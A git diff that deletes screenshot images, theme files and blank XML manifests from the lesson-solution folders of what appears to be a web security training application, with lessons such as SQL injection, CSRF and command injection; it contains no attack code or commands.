diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
deleted file mode 100644
index 085ceea56..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png
deleted file mode 100644
index 5fef4d85b..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png
deleted file mode 100644
index 950942ed9..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png
deleted file mode 100644
index 8c3ee5181..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png
deleted file mode 100644
index 54ea1bcb2..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png
deleted file mode 100644
index 3668266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png
deleted file mode 100644
index 9987542b3..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg
deleted file mode 100644
index f5c8d4841..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg
deleted file mode 100644
index 68702bb41..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg
deleted file mode 100644
index b6e84a5fe..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg
deleted file mode 100644
index 93a58e837..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg
deleted file mode 100644
index 6055cba63..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg
deleted file mode 100644
index 2e2bf3fc5..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg
deleted file mode 100644
index b7b54355c..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg b/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg
deleted file mode 100644
index 716f2aad9..000000000
Binary files a/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml b/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
deleted file mode 100644
index 7f94019c7..000000000
--- a/src/main/webapp/lesson_solutions/CSRF_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image001.png b/src/main/webapp/lesson_solutions/CSRF_files/image001.png
deleted file mode 100644
index 9d82bd95a..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image003.png b/src/main/webapp/lesson_solutions/CSRF_files/image003.png
deleted file mode 100644
index 2189df262..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image005.png b/src/main/webapp/lesson_solutions/CSRF_files/image005.png
deleted file mode 100644
index 95949f62b..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image007.png b/src/main/webapp/lesson_solutions/CSRF_files/image007.png
deleted file mode 100644
index 7bf06a985..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image009.png b/src/main/webapp/lesson_solutions/CSRF_files/image009.png
deleted file mode 100644
index d0e2f233c..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg
deleted file mode 100644
index fbb254bd8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg
deleted file mode 100644
index 32dbb3c02..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg
deleted file mode 100644
index 8d76909d8..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg
deleted file mode 100644
index be9c8e294..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg b/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg
deleted file mode 100644
index ef71f6923..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx b/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CSRF_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg b/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg
deleted file mode 100644
index e51a40ad0..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png b/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png
deleted file mode 100644
index e8f391339..000000000
Binary files a/src/main/webapp/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
deleted file mode 100644
index c778dd663..000000000
--- a/src/main/webapp/lesson_solutions/CommandInjection_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png
deleted file mode 100644
index 95185ac08..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png
deleted file mode 100644
index bb6e1e518..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png b/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png
deleted file mode 100644
index 9c7ecd242..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg
deleted file mode 100644
index d82452e33..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg
deleted file mode 100644
index 67162e723..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg b/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg
deleted file mode 100644
index 916c6fdc1..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/CommandInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg
deleted file mode 100644
index 408d75d35..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg
deleted file mode 100644
index 455c17580..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg b/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg
deleted file mode 100644
index ef1515bd6..000000000
Binary files a/src/main/webapp/lesson_solutions/ConcurrencyCart_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png
deleted file mode 100644
index 3971e484f..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png
deleted file mode 100644
index 48e299a23..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/iframePromptHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png
deleted file mode 100644
index df21320e8..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/imgPromptHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png
deleted file mode 100644
index b44361734..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsComplete.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png
deleted file mode 100644
index 7f0518029..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png
deleted file mode 100644
index 6257299d0..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png b/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png
deleted file mode 100644
index 42f27f677..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfPromptByPass_files/transferFundsPrompt.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png
deleted file mode 100644
index 8e2b1503e..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHack.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png
deleted file mode 100644
index e09a7fc57..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenHacked.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png b/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png
deleted file mode 100644
index 5c6927667..000000000
Binary files a/src/main/webapp/lesson_solutions/CsrfTokenByPass_files/tokenPage.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
deleted file mode 100644
index 44904329e..000000000
--- a/src/main/webapp/lesson_solutions/DOMInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png
deleted file mode 100644
index 8d3b529b0..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg
deleted file mode 100644
index 3f3bccdf5..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png
deleted file mode 100644
index 9effd17b9..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg
deleted file mode 100644
index 016c16e12..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png
deleted file mode 100644
index 844b00d92..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg
deleted file mode 100644
index c3349b050..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png
deleted file mode 100644
index d0b0aec8e..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg
deleted file mode 100644
index 18a4764fe..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg
deleted file mode 100644
index 1112e63f7..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png
deleted file mode 100644
index d1021bceb..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg
deleted file mode 100644
index e9bc078c3..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png b/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png
deleted file mode 100644
index efe585a32..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg b/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg
deleted file mode 100644
index dd8bf4ac4..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db b/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db
deleted file mode 100644
index 550da4fb2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg
deleted file mode 100644
index c62bcbd94..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg
deleted file mode 100644
index 77ce23c41..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg
deleted file mode 100644
index ce288a551..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image003.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg b/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg
deleted file mode 100644
index 6ae8cdfda..000000000
Binary files a/src/main/webapp/lesson_solutions/DOMXSS_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml b/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
deleted file mode 100644
index 065d671e4..000000000
--- a/src/main/webapp/lesson_solutions/DOS_Login_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png
deleted file mode 100644
index dc2669fe2..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg
deleted file mode 100644
index 6f5c75387..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png b/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png
deleted file mode 100644
index 45396104d..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg b/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg
deleted file mode 100644
index 372cdca56..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx b/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/DOS_Login_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
deleted file mode 100644
index bdb35f85a..000000000
--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png
deleted file mode 100644
index 44e09369d..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png
deleted file mode 100644
index 1cf2cc012..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png
deleted file mode 100644
index 9f5747a75..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png
deleted file mode 100644
index 0845266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg
deleted file mode 100644
index c871b0225..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg
deleted file mode 100644
index 74cec6054..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg
deleted file mode 100644
index 29defb100..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg
deleted file mode 100644
index 09d5ac828..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
deleted file mode 100644
index 6616ecc49..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png
deleted file mode 100644
index c9047d693..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg
deleted file mode 100644
index 101e688a4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png
deleted file mode 100644
index 569dc0098..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg
deleted file mode 100644
index 6fe272fa4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png
deleted file mode 100644
index f2945e2b0..000000000
